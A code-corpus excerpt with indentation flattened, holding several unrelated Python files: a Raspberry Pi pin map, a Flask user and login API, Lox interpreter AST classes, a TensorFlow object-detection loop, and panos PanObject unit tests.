pin_type=PinTypes.GPIO,
special_func=None
)
])
@staticmethod
def inner_row():
return Row(row_name=RowNames.INNER, pins=[
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=0),
id=None,
pin_type=PinTypes.POWER_3V3,
special_func=None
),
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=1),
id=2,
pin_type=PinTypes.GPIO,
special_func=None
),
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=2),
id=3,
pin_type=PinTypes.GND,
special_func=None
),
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=3),
id=4,
pin_type=PinTypes.GPIO,
special_func="GPIO_GCLK"
),
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=4),
id=None,
pin_type=PinTypes.GND,
special_func="GND"
),
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=5),
id=17,
pin_type=PinTypes.GPIO,
special_func="GPIO_GEN_0"
),
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=6),
id=27,
pin_type=PinTypes.GPIO,
special_func="GPIO_GEN2"
),
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=7),
id=22,
pin_type=PinTypes.GPIO,
special_func="GPIO_GEN_3"
),
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=8),
id=None,
pin_type=PinTypes.POWER_3V3,
special_func="3V3"
),
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=9),
id=10,
pin_type=PinTypes.GPIO,
special_func="SPI_MOSI"
),
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=10),
id=9,
pin_type=PinTypes.GPIO,
special_func="SPI_MISO"
),
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=11),
id=11,
pin_type=PinTypes.GPIO,
special_func="SPI_CLK"
),
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=12),
id=None,
pin_type=PinTypes.GND,
special_func="GND"
),
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=13),
id=0,
pin_type=PinTypes.EEPROM,
special_func="I2C EEPROM ID_SD"
),
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=14),
id=5,
pin_type=PinTypes.GPIO,
special_func=None
),
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=15),
id=6,
pin_type=PinTypes.GPIO,
special_func=None
),
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=16),
id=13,
pin_type=PinTypes.GPIO,
special_func=None
),
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=17),
id=19,
pin_type=PinTypes.GPIO,
special_func=None
),
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=18),
id=26,
pin_type=PinTypes.GPIO,
special_func=None
),
Pin(
coords=PinCoords(row_name=RowNames.INNER, pin_pair_num=19),
id=None,
pin_type=PinTypes.GND,
special_func="GND"
)
])
def print_pins():
rpi_pins = RPi3Pins()
longwise_pins = zip(rpi_pins.inner_row().pins, rpi_pins.outer_row().pins)
print(' Power light ^^ ')
def pin_as_string(pin):
pin_id = str(pin.id)
special_func = ']\t\t\t'
if pin.special_func is not None:
special_func = '(' + pin.special_func + ')]\t\t'
return '[' + pin_id + ': ' + pin.pin_type + special_func
for echelon in longwise_pins:
print(echelon[0].coords.pin_pair_num, '\t',
pin_as_string(echelon[0]),
pin_as_string(echelon[1]))
print()
print(' USB Connectors ')
if __name__ == '__main__':
print_pins()
| StarcoderdataPython |
165995 | <gh_stars>0
from flask_restplus import Namespace, Resource, fields
from restApi.models.users import User
from restApi.helpers.user_helper import UserParser
from restApi.helpers.login_helper import LoginParser
import jwt
from instance.config import Config
from werkzeug.security import check_password_hash, generate_password_hash
from flask import request, jsonify
import datetime
from restApi.resources.auth import token_required
blacklist = set()
User_object = User()
user_api = Namespace("Users", description="")
new_user = user_api.model('Users', {'email': fields.String('<EMAIL>'),
'username': fields.String('test_user'),
'password': fields.String('<PASSWORD>'),
'confirm_password': fields.String('<PASSWORD>')
})
user_login = user_api.model('Login', {'email': fields.String('<EMAIL>'),
'password': fields.String('<PASSWORD>')})
class Users(Resource):
@token_required
@user_api.doc(security='apikey')
def get(self):
response = User_object.get_all_users()
return response, 200
@user_api.expect(new_user)
def post(self):
data = UserParser.parser.parse_args()
hashed_pass = generate_password_hash(data['password'])
new_user = User_object.get_single_user(data['email'])
for items in data.values():
if items == "":
return "Fields must not be blank"
if new_user:
return "user with email: {} already exists".format(data["email"]), 400
if check_password_hash(hashed_pass, data['confirm_password']):
User_object.create_user(data['email'], data['username'], hashed_pass)
return "User registered successfully", 201
return "passwords do not match", 401
class Update(Resource):
@user_api.expect(new_user)
@token_required
@user_api.doc(security='apikey')
def put(self, email):
data = UserParser.parser.parse_args()
user_update = User_object.get_single_user(email)
hashed_password = generate_password_hash(data['password'])
for items in data.values():
if items == "":
return "Fields must not be blank", 400
if user_update:
if check_password_hash(hashed_password, data['confirm_password']):
User_object.update_user(data['email'], data['username'], hashed_password)
return "User updated successfully", 200
return "passwords do not match"
return "user does not exist"
class LogIn(Resource):
@user_api.expect(user_login)
def post(self):
if not request.is_json:
return jsonify({"msg": "Missing JSON in request"}), 400
data = LoginParser.parser.parse_args()
email = str(data['email'])
password = str(data['password'])
if email in User_object.users:
if check_password_hash(User_object.users[email]['password'], password):
access_token = jwt.encode(
{"email": email, "exp": datetime.datetime.utcnow() + datetime.timedelta(minutes=1)}, Config.SECRET)
return {"access_token": access_token.decode('utf-8')}, 200
return {"msg": "Invalid email or password"}, 401
return "user does not exist", 400
# class LogOut(Resource):
# @token_required
# def post(self):
# jti = get_raw_jwt()['jti']
# blacklist.add(jti)
# return {"msg": "Successfully logged out"}, 200
user_api.add_resource(Users, '/users')
user_api.add_resource(Update, '/users/<string:email>')
user_api.add_resource(LogIn, '/users/login')
# user_api.add_resource(LogOut, '/users/logout')
| StarcoderdataPython |
3332479 | <gh_stars>1-10
# THIS FILE HAS BEEN AUTOGENERATED
from __future__ import annotations
import typing as t
from abc import ABC, abstractmethod
import attr
from pylox.protocols.visitor import VisitorProtocol
from pylox.tokens import LITERAL_T, Token
class Expr(ABC): # pragma: no cover
pass
@abstractmethod
def accept(self, visitor: VisitorProtocol) -> t.Any:
return NotImplemented
@attr.s(slots=True, eq=False)
class Assign(Expr):
name: Token = attr.ib()
value: Expr = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Assign(self)
@attr.s(slots=True, eq=False)
class Binary(Expr):
expr_left: Expr = attr.ib()
token_operator: Token = attr.ib()
expr_right: Expr = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Binary(self)
@attr.s(slots=True, eq=False)
class Call(Expr):
callee: Expr = attr.ib()
closing_paren: Token = attr.ib()
arguments: list[Expr] = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Call(self)
@attr.s(slots=True, eq=False)
class Get(Expr):
object_: Expr = attr.ib()
name: Token = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Get(self)
@attr.s(slots=True, eq=False)
class Grouping(Expr):
expr_expression: Expr = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Grouping(self)
@attr.s(slots=True, eq=False)
class Literal(Expr):
object_value: LITERAL_T = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Literal(self)
@attr.s(slots=True, eq=False)
class Logical(Expr):
expr_left: Expr = attr.ib()
token_operator: Token = attr.ib()
expr_right: Expr = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Logical(self)
@attr.s(slots=True, eq=False)
class Set(Expr):
object_: Expr = attr.ib()
name: Token = attr.ib()
value: Expr = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Set(self)
@attr.s(slots=True, eq=False)
class Super(Expr):
keyword: Token = attr.ib()
method: Token = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Super(self)
@attr.s(slots=True, eq=False)
class This(Expr):
keyword: Token = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_This(self)
@attr.s(slots=True, eq=False)
class Unary(Expr):
token_operator: Token = attr.ib()
expr_right: Expr = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Unary(self)
@attr.s(slots=True, eq=False)
class Variable(Expr):
name: Token = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Variable(self)
class Stmt(ABC): # pragma: no cover
pass
@abstractmethod
def accept(self, visitor: VisitorProtocol) -> t.Any:
return NotImplemented
@attr.s(slots=True, eq=False)
class Block(Stmt):
statements: list[Stmt] = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Block(self)
@attr.s(slots=True, eq=False)
class Class(Stmt):
name: Token = attr.ib()
superclass: t.Optional[Variable] = attr.ib()
methods: list[Function] = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Class(self)
@attr.s(slots=True, eq=False)
class Expression(Stmt):
expr_expression: Expr = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Expression(self)
@attr.s(slots=True, eq=False)
class Function(Stmt):
name: Token = attr.ib()
params: list[Token] = attr.ib()
body: list[Stmt] = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Function(self)
@attr.s(slots=True, eq=False)
class If(Stmt):
condition: Expr = attr.ib()
then_branch: Stmt = attr.ib()
else_branch: t.Optional[Stmt] = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_If(self)
@attr.s(slots=True, eq=False)
class Var(Stmt):
name: Token = attr.ib()
initializer: t.Optional[Expr] = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Var(self)
@attr.s(slots=True, eq=False)
class Return(Stmt):
keyword: Token = attr.ib()
value: t.Optional[Expr] = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Return(self)
@attr.s(slots=True, eq=False)
class Print(Stmt):
expr_expression: Expr = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Print(self)
@attr.s(slots=True, eq=False)
class While(Stmt):
condition: Expr = attr.ib()
body: Stmt = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_While(self)
@attr.s(slots=True, eq=False)
class Break(Stmt):
keyword: Token = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Break(self)
@attr.s(slots=True, eq=False)
class Continue(Stmt):
keyword: Token = attr.ib()
def accept(self, visitor: VisitorProtocol) -> t.Any:
return visitor.visit_Continue(self)
| StarcoderdataPython |
4974216 | # Author : <NAME> (<EMAIL>)
# Modified From API
# https://github.com/wagonhelm/TF_ObjectDetection_API/blob/master/ChessObjectDetection.ipynb
import skimage
import numpy as np
from skimage import io, transform
import os
import shutil
import glob
import pandas as pd
import xml.etree.ElementTree as ET
import tensorflow as tf
from collections import defaultdict
from io import StringIO
from matplotlib import pyplot as plt
from PIL import Image
import urllib.request
import urllib.error
import cv2
import scipy.misc
from scipy.ndimage import imread
from utils.app_utils import FPS, WebcamVideoStream
from utils import label_map_util
from utils import visualization_utils as vis_util
root = os.getcwd()
imagePath = os.path.join(root, 'fighters')
labelsPath = os.path.join(root, 'labels')
linksPath = os.path.join(imagePath, 'imageLinks')
trainPath = os.path.join(imagePath, 'train')
testPath = os.path.join(imagePath, 'test')
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = 'object_detection_graph/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = 'data/label_map.pbtxt'
PATH_TO_IMAGES = 'fighters/fighter/fighters '
NUM_CLASSES = 2
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
def load_image_into_numpy_array(image):
(im_width, im_height) = image.size
return np.array(image.getdata()).reshape(
(im_height, im_width, 3)).astype(np.uint8)
# Modified From API
# https://github.com/tensorflow/models/blob/master/research/object_detection/object_detection_tutorial.ipynb
with detection_graph.as_default():
with tf.Session(graph=detection_graph) as sess:
# Definite input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')
num_detections = detection_graph.get_tensor_by_name('num_detections:0')
print(detection_classes)
#src=0 --> /dev/video0. change src number according to your video node
video_capture = WebcamVideoStream(src=0,
width=720,
height=480).start()
fps = FPS().start()
i =1
while(True):
frame = scipy.misc.imread(PATH_TO_IMAGES + str(i).zfill(4) + '.jpg', mode="RGB")
# frame = cv2.imread(PATH_TO_IMAGES + str(i % 12 + 1).zfill(3) + '.jpg')
# print(PATH_TO_IMAGES + str(i % 12 + 1) + '.jpg')
# print(frame)
# gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# frame = video_capture.read()
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
image_np_expanded = np.expand_dims(frame_rgb, axis=0)
# Actual detection.
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores, detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
print(boxes)
print(scores)
print('***************** Visualization ************')
# Visualization of the results of a detection.
vis_util.visualize_boxes_and_labels_on_image_array(
frame_rgb,
np.squeeze(boxes),
np.squeeze(classes).astype(np.int32),
np.squeeze(scores),
category_index,
use_normalized_coordinates=True,
line_thickness=2)
output_rgb = cv2.cvtColor(frame_rgb, cv2.COLOR_RGB2BGR)
cv2.imshow('Object Detection', output_rgb)
fps.update()
i = i + 1
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# input("Press Enter to continue...")
| StarcoderdataPython |
8189198 | <gh_stars>1-10
# Copyright (c) 2014, Palo Alto Networks
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
try:
from unittest import mock
except ImportError:
import mock
import random
import unittest
import uuid
import xml.etree.ElementTree as ET
import pan.xapi
import panos.base as Base
import panos.errors as Err
OBJECT_NAME = "MyObjectName"
VSYS = "vsys1"
class TestPanObject(unittest.TestCase):
def setUp(self):
self.obj = Base.PanObject(OBJECT_NAME)
def verify_object(self, obj, **kwargs):
self.assertEqual(kwargs.get("name", None), obj.name)
self.assertEqual(kwargs.get("children", []), obj.children)
self.assertEqual(kwargs.get("parent", None), obj.parent)
def test_create_with_name(self):
self.obj = Base.PanObject(OBJECT_NAME)
self.verify_object(self.obj, name=OBJECT_NAME)
def test_create_without_name(self):
self.obj = Base.PanObject()
self.verify_object(self.obj)
def test_str_of_object_with_name(self):
self.assertEqual(OBJECT_NAME, str(self.obj))
def test_str_of_object_without_name(self):
self.obj = Base.PanObject()
self.assertEqual("None", str(self.obj))
def test_has_callable_variables(self):
self.assertTrue(callable(self.obj.variables))
def test_property_vsys_without_parent(self):
self.assertIsNone(self.obj.vsys)
def test_property_vsys_with_parent(self):
self.obj.parent = mock.Mock(vsys=VSYS)
self.assertEqual(VSYS, self.obj.vsys)
def test_property_vsys_raises_error(self):
self.assertRaises(Err.PanDeviceError, setattr, self.obj, "vsys", "foo")
def test_property_uid(self):
expected = OBJECT_NAME
ret_val = self.obj.uid
self.assertEqual(expected, ret_val)
def test_add_without_children(self):
CHILD_NAME = "child"
child = Base.PanObject(CHILD_NAME)
ret_value = self.obj.add(child)
self.assertEqual(child, ret_value)
self.verify_object(self.obj, name=OBJECT_NAME, children=[child,])
self.verify_object(child, name=CHILD_NAME, parent=self.obj)
def test_add_with_children(self):
CHILD1_NAME = "FirstChild"
child1 = Base.PanObject(CHILD1_NAME)
child1.parent = self.obj
self.obj.children = [
child1,
]
CHILD2_NAME = "SecondChild"
child2 = Base.PanObject(CHILD2_NAME)
ret_val = self.obj.add(child2)
self.assertEqual(child2, ret_val)
self.verify_object(self.obj, name=OBJECT_NAME, children=[child1, child2])
self.verify_object(child1, name=CHILD1_NAME, parent=self.obj)
self.verify_object(child2, name=CHILD2_NAME, parent=self.obj)
def test_insert_without_children(self):
CHILD_NAME = "Child"
child = Base.PanObject(CHILD_NAME)
ret_val = self.obj.insert(0, child)
self.assertEqual(child, ret_val)
self.verify_object(self.obj, name=OBJECT_NAME, children=[child,])
self.verify_object(child, name=CHILD_NAME, parent=self.obj)
def test_insert_with_children(self):
CHILD1_NAME = "FirstChild"
child1 = Base.PanObject(CHILD1_NAME)
child1.parent = self.obj
CHILD3_NAME = "ThirdChild"
child3 = Base.PanObject(CHILD3_NAME)
child3.parent = self.obj
self.obj.children = [child1, child3]
CHILD2_NAME = "SecondChild"
child2 = Base.PanObject(CHILD2_NAME)
ret_val = self.obj.insert(1, child2)
self.assertEqual(child2, ret_val)
self.verify_object(
self.obj, name=OBJECT_NAME, children=[child1, child2, child3]
)
self.verify_object(child1, name=CHILD1_NAME, parent=self.obj)
self.verify_object(child2, name=CHILD2_NAME, parent=self.obj)
self.verify_object(child3, name=CHILD3_NAME, parent=self.obj)
def test_extend_without_children(self):
CHILD1_NAME = "FirstChild"
child1 = Base.PanObject(CHILD1_NAME)
CHILD2_NAME = "SecondChild"
child2 = Base.PanObject(CHILD2_NAME)
children = [child1, child2]
ret_val = self.obj.extend(children)
self.assertIsNone(ret_val)
self.verify_object(self.obj, name=OBJECT_NAME, children=children)
self.verify_object(child1, name=CHILD1_NAME, parent=self.obj)
self.verify_object(child2, name=CHILD2_NAME, parent=self.obj)
def test_extend_with_children(self):
CHILD1_NAME = "FirstChild"
child1 = Base.PanObject(CHILD1_NAME)
child1.parent = self.obj
self.obj.children = [
child1,
]
CHILD2_NAME = "SecondChild"
child2 = Base.PanObject(CHILD2_NAME)
CHILD3_NAME = "ThirdChild"
child3 = Base.PanObject(CHILD3_NAME)
new_children = [child2, child3]
all_children = [child1, child2, child3]
ret_val = self.obj.extend(new_children)
self.assertIsNone(ret_val)
self.verify_object(self.obj, name=OBJECT_NAME, children=all_children)
self.verify_object(child1, name=CHILD1_NAME, parent=self.obj)
self.verify_object(child2, name=CHILD2_NAME, parent=self.obj)
self.verify_object(child3, name=CHILD3_NAME, parent=self.obj)
def test_pop(self):
CHILD_NAME = "Child"
child = Base.PanObject(CHILD_NAME)
child.parent = self.obj
self.obj.children = [
child,
]
ret_val = self.obj.pop(0)
self.assertEqual(child, ret_val)
self.verify_object(self.obj, name=OBJECT_NAME)
self.verify_object(child, name=CHILD_NAME)
def test_pop_raises_error(self):
"""An invalid index should raise IndexError."""
self.assertRaises(IndexError, self.obj.pop, 0)
def test_remove(self):
CHILD1_NAME = "Child1"
child1 = Base.PanObject(CHILD1_NAME)
child1.parent = self.obj
CHILD2_NAME = "Child2"
child2 = Base.PanObject(CHILD2_NAME)
child2.parent = self.obj
self.obj.children = [child1, child2]
ret_val = self.obj.remove(child2)
self.assertIsNone(ret_val)
self.verify_object(self.obj, name=OBJECT_NAME, children=[child1,])
self.verify_object(child1, name=CHILD1_NAME, parent=self.obj)
self.verify_object(child2, name=CHILD2_NAME)
def test_remove_raises_error(self):
"""An invalid child should raise ValueError."""
CHILD1_NAME = "Child1"
child1 = Base.PanObject(CHILD1_NAME)
child1.parent = self.obj
CHILD2_NAME = "Child2"
child2 = Base.PanObject(CHILD2_NAME)
self.obj.children = [
child1,
]
self.assertRaises(ValueError, self.obj.remove, child2)
def test_remove_by_name_when_find_returns_index(self):
CHILD_NAME = "MyChild"
self.obj.children = [1, 2, 3]
INDEX_VALUE = 4
self.obj.find_index = mock.Mock(return_value=INDEX_VALUE)
POP_RETURN_VALUE = "foo"
self.obj.pop = mock.Mock(return_value=POP_RETURN_VALUE)
ret_val = self.obj.remove_by_name(CHILD_NAME, None)
self.assertEqual(POP_RETURN_VALUE, ret_val)
self.obj.find_index.assert_called_once_with(CHILD_NAME, None)
self.obj.pop.assert_called_once_with(INDEX_VALUE)
def test_remove_by_name_when_find_returns_none(self):
CHILD_NAME = "foo"
self.obj.children = ["a", "b", "c"]
self.obj.find_index = mock.Mock(return_value=None)
ret_val = self.obj.remove_by_name(CHILD_NAME, None)
self.assertIsNone(ret_val)
self.obj.find_index.assert_called_once_with(CHILD_NAME, None)
# Skipping removeall
# Skipping xpath_nosuffix
# Skipping xpath_short
def test_xpath_vsys_without_parent(self):
ret_val = self.obj.xpath_vsys()
self.assertIsNone(ret_val)
def test_xpath_vsys_with_parent(self):
expected_value = "foo"
spec = {
"xpath_vsys.return_value": expected_value,
}
self.obj.parent = mock.Mock(**spec)
ret_val = self.obj.xpath_vsys()
self.assertEqual(expected_value, ret_val)
self.obj.parent.xpath_vsys.assert_called_once_with()
def test_xpath_panorama_without_parent(self):
ret_val = self.obj.xpath_panorama()
self.assertIsNone(ret_val)
def test_xpath_panorama_with_parent(self):
expected_value = "foo"
spec = {
"xpath_panorama.return_value": expected_value,
}
self.obj.parent = mock.Mock(**spec)
ret_val = self.obj.xpath_panorama()
self.assertEqual(expected_value, ret_val)
self.obj.parent.xpath_panorama.assert_called_once_with()
# Skip element()
@mock.patch("panos.base.ET")
def test_element_str(self, m_ET):
Element_Value = 42
self.obj.element = mock.Mock(return_value=Element_Value)
Tostring_Value = "42"
spec = {
"tostring.return_value": Tostring_Value,
}
m_ET.configure_mock(**spec)
ret_val = self.obj.element_str()
self.assertEqual(Tostring_Value, ret_val)
self.obj.element.assert_called_once_with()
m_ET.tostring.assert_called_once_with(Element_Value, encoding="utf-8")
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
@mock.patch("panos.base.ET")
def test_root_element_with_entry_suffix(self, m_ET, m_uid):
self.obj.SUFFIX = Base.ENTRY
Uid = "uid"
expected = "Value"
spec = {
"Element.return_value": expected,
}
m_ET.configure_mock(**spec)
m_uid.return_value = Uid
ret_val = self.obj._root_element()
self.assertEqual(expected, ret_val)
m_ET.Element.assert_called_once_with("entry", {"name": Uid})
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
@mock.patch("panos.base.ET")
def test_root_element_with_member_suffix(self, m_ET, m_uid):
self.obj.SUFFIX = Base.MEMBER
Uid = "uid"
expected = mock.Mock(text=Uid)
spec = {
"Element.return_value": mock.Mock(),
}
m_ET.configure_mock(**spec)
m_uid.return_value = Uid
ret_val = self.obj._root_element()
self.assertEqual(Uid, ret_val.text)
m_ET.Element.assert_called_once_with("member")
@mock.patch("panos.base.ET")
def test_root_element_with_none_suffix_no_slashes(self, m_ET):
self.obj.SUFFIX = None
expected_tag = "baz"
full_path = expected_tag
self.obj.XPATH = full_path
expected_value = "42"
spec = {
"Element.return_value": expected_value,
}
m_ET.configure_mock(**spec)
ret_val = self.obj._root_element()
self.assertEqual(expected_value, ret_val)
m_ET.Element.assert_called_once_with(expected_tag)
@mock.patch("panos.base.ET")
def test_root_element_with_none_suffix_multiple_slashes(self, m_ET):
self.obj.SUFFIX = None
expected_tag = "baz"
full_path = "/foo/bar/baz"
self.obj.XPATH = full_path
expected_value = "42"
spec = {
"Element.return_value": expected_value,
}
m_ET.configure_mock(**spec)
ret_val = self.obj._root_element()
self.assertEqual(expected_value, ret_val)
m_ET.Element.assert_called_once_with(expected_tag)
# Skip _subelements
def test_check_child_methods_for_name_not_in_childmethods(self):
spec = {
"_check_child_methods.return_value": None,
}
for x in range(3):
m = mock.Mock(**spec)
self.obj.children.append(m)
Method = str(uuid.uuid4()).replace("-", "_")
ret_val = self.obj._check_child_methods(Method)
self.assertIsNone(ret_val)
for c in self.obj.children:
c._check_child_methods.assert_called_once_with(Method)
def test_check_child_methods_for_name_in_childmethods(self):
spec = {
"_check_child_methods.return_value": None,
}
for x in range(3):
m = mock.Mock(**spec)
self.obj.children.append(m)
Method = str(uuid.uuid4()).replace("-", "_")
self.obj.CHILDMETHODS += (Method,)
setattr(self.obj, "child_{0}".format(Method), mock.Mock())
ret_val = self.obj._check_child_methods(Method)
self.assertIsNone(ret_val)
m = getattr(self.obj, "child_{0}".format(Method))
m.assert_called_once_with()
for c in self.obj.children:
c._check_child_methods.assert_called_once_with(Method)
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test_apply_with_ha_sync(self, m_uid):
PanDeviceId = "42"
PanDeviceXpath = "path"
PanDeviceElementStr = "element string"
spec = {
"id": PanDeviceId,
}
m_panos = mock.Mock(**spec)
self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
self.obj.xpath = mock.Mock(return_value=PanDeviceXpath)
self.obj.element_str = mock.Mock(return_value=PanDeviceElementStr)
m_uid.return_value = "uid"
for x in range(3):
child = mock.Mock(**spec)
self.obj.children.append(child)
ret_val = self.obj.apply()
self.assertIsNone(ret_val)
m_panos.set_config_changed.assert_called_once_with()
m_panos.active().xapi.edit.assert_called_once_with(
PanDeviceXpath, PanDeviceElementStr, retry_on_peer=self.obj.HA_SYNC,
)
self.obj.xpath.assert_called_once_with()
self.obj.element_str.assert_called_once_with()
for c in self.obj.children:
c._check_child_methods.assert_called_once_with("apply")
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test_apply_without_ha_sync(self, m_uid):
PanDeviceId = "42"
PanDeviceXpath = "path"
PanDeviceElementStr = "element string"
self.obj.HA_SYNC = False
spec = {
"id": PanDeviceId,
}
m_panos = mock.Mock(**spec)
self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
self.obj.xpath = mock.Mock(return_value=PanDeviceXpath)
self.obj.element_str = mock.Mock(return_value=PanDeviceElementStr)
m_uid.return_value = "uid"
for x in range(3):
child = mock.Mock(**spec)
self.obj.children.append(child)
ret_val = self.obj.apply()
self.assertIsNone(ret_val)
m_panos.set_config_changed.assert_called_once_with()
m_panos.xapi.edit.assert_called_once_with(
PanDeviceXpath, PanDeviceElementStr, retry_on_peer=self.obj.HA_SYNC,
)
self.obj.xpath.assert_called_once_with()
self.obj.element_str.assert_called_once_with()
for c in self.obj.children:
c._check_child_methods.assert_called_once_with("apply")
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test_create_with_ha_sync(self, m_uid):
PanDeviceId = "42"
PanDeviceXpath = "path"
PanDeviceElementStr = "element string"
spec = {
"id": PanDeviceId,
}
m_panos = mock.Mock(**spec)
self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
self.obj.xpath_short = mock.Mock(return_value=PanDeviceXpath)
self.obj.element_str = mock.Mock(return_value=PanDeviceElementStr)
m_uid.return_value = "uid"
for x in range(3):
child = mock.Mock(**spec)
self.obj.children.append(child)
ret_val = self.obj.create()
self.assertIsNone(ret_val)
m_panos.set_config_changed.assert_called_once_with()
m_panos.active().xapi.set.assert_called_once_with(
PanDeviceXpath, PanDeviceElementStr, retry_on_peer=self.obj.HA_SYNC,
)
self.obj.xpath_short.assert_called_once_with()
self.obj.element_str.assert_called_once_with()
for c in self.obj.children:
c._check_child_methods.assert_called_once_with("create")
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test_create_without_ha_sync(self, m_uid):
PanDeviceId = "42"
PanDeviceXpath = "path"
PanDeviceElementStr = "element string"
self.obj.HA_SYNC = False
spec = {
"id": PanDeviceId,
}
m_panos = mock.Mock(**spec)
self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
self.obj.xpath_short = mock.Mock(return_value=PanDeviceXpath)
self.obj.element_str = mock.Mock(return_value=PanDeviceElementStr)
m_uid.return_value = "uid"
for x in range(3):
child = mock.Mock()
self.obj.children.append(child)
ret_val = self.obj.create()
self.assertIsNone(ret_val)
m_panos.set_config_changed.assert_called_once_with()
m_panos.xapi.set.assert_called_once_with(
PanDeviceXpath, PanDeviceElementStr, retry_on_peer=self.obj.HA_SYNC,
)
self.obj.xpath_short.assert_called_once_with()
self.obj.element_str.assert_called_once_with()
for c in self.obj.children:
c._check_child_methods.assert_called_once_with("create")
@mock.patch("panos.base.PanObject.uid", new_callable=mock.PropertyMock)
def test_delete_with_ha_sync_no_parent(self, m_uid):
PanDeviceId = "42"
PanDeviceXpath = "path"
spec = {
"id": PanDeviceId,
}
m_panos = mock.Mock(**spec)
self.obj.nearest_pandevice = mock.Mock(return_value=m_panos)
self.obj.xpath = mock.Mock(return_value=PanDeviceXpath)
